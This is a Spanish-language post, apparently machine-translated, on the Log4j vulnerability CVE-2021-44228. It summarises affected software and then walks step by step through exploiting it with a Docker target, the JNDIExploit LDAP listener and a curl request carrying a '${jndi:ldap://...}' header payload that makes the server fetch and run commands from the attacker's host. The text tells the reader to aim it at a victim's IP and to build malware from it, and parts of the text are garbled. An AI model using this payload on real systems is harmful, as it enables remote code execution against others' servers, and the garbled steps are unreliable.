

Se ha encontrado una vulnerabilidad de ejecución remota de código relacionada con la librería de registro de Java Log4j.
CVE-2021-44228 Esta vulnerabilidad ha causado un gran revuelo en la comunidad cibernética mundial; desde Wannacry no veíamos un impacto semejante.
Se cree que la mayoría de las aplicaciones escritas en Java están afectadas y son vulnerables, particularmente los frameworks de Apache, incluyendo Apache Struts2, Apache Solr, Apache Druid y Apache Flink. Además, ElasticSearch, Flume, Logstash, Kafka, Netty, MyBatis y Spring-Boot-starter-log4j también son vulnerables. Algunos de los productos y servicios más populares de Internet —incluidos Apple iCloud, Amazon, Steam y Twitter— dependen de estos frameworks para funcionar. También se cree que esto incluye un número significativo de aplicaciones empresariales y de ciberseguridad.
Radware (servicios DDoS adaptativos en tiempo real de forma continua) afirmó que solo el software que habilita y utiliza la sustitución de búsqueda de mensajes de log4j está afectado. A partir de la versión 2.15.0, la sustitución de búsqueda de mensajes está deshabilitada por defecto, por lo que es necesario parchear el sistema. Las versiones de Log4j 2 de la 2.0-beta9 a la 2.14.1 son todas vulnerables y explotables.


antes que nada, esta guía es compatible para trabajar con la VM de kali linux y ejecutar el listener de java con el siguiente comando, como en el lado izquierdo de la guía de video. comienza construyendo la aplicación vulnerable con docker y luego ejecútala. así que hagamos esto.
docker build . -t vulnerable-appel siguiente paso, en realidad, es ejecutar la vulnerable-app, que ya está desplegada.
*así que, el siguiente comando:
docker run -p 8080:8080 --name vulnerable-app vulnerable-app
y ahora el script de spring debería ejecutarse como en la guía de video.
por ahora, para obtener la huella del servidor ldap, solo necesitamos crear el enlace ldap y listo. Primero descarga la herramienta de explotación JNDIExploit-1.2. la url de descarga de JNDIExploit fue eliminada por github; para descargarla desde el archivo (url abajo). obtén la siguiente url para descargar desde el archivo JNDIExploitArchiveUrl
así que, hagamos esto.
descomprime el JNDIExploit.
ejecuta el listener de java: java -jar JNDIExploit.v1.2-SNAPSHOT.jar -i "replace_with_ypure_IP-ADDR" -p 8888.
nota: elimina "replace_with your IP-addr" e ingresa tu IP del listener. (Sin incluir corchetes).
el siguiente paso para activar el exploit es ejecutar el siguiente comando:
curl 127.0.0.1:8080 -H 'X-Api-Version: ${jndi:ldap://"ip-addr":1389/Basic/Command/Base64/aGVsbG8td29ybGQ=}'
nota: reemplaza el "ip-addr" por tu ip local que está escuchando a través de java" y también reemplaza el 127.0.0.1 por la ip de la víctima, y con esto termina. Recibirás la cadena hello-world en base64. De esta manera puedes hacer cualquier manipulación. Descubre más técnicas para usar, mincraft, se puede manipular a través de la herramienta burpsuite para servicios abiertos en el ordenador, etc. Imagínate esto: entra en modo productivo y aumenta tu improvisación, compone el siguiente malware.
puedes reemplazar la cadena base64 (hello-world) por código JS de ejecución compatible para ejecutar consultas a través del servidor LDAP.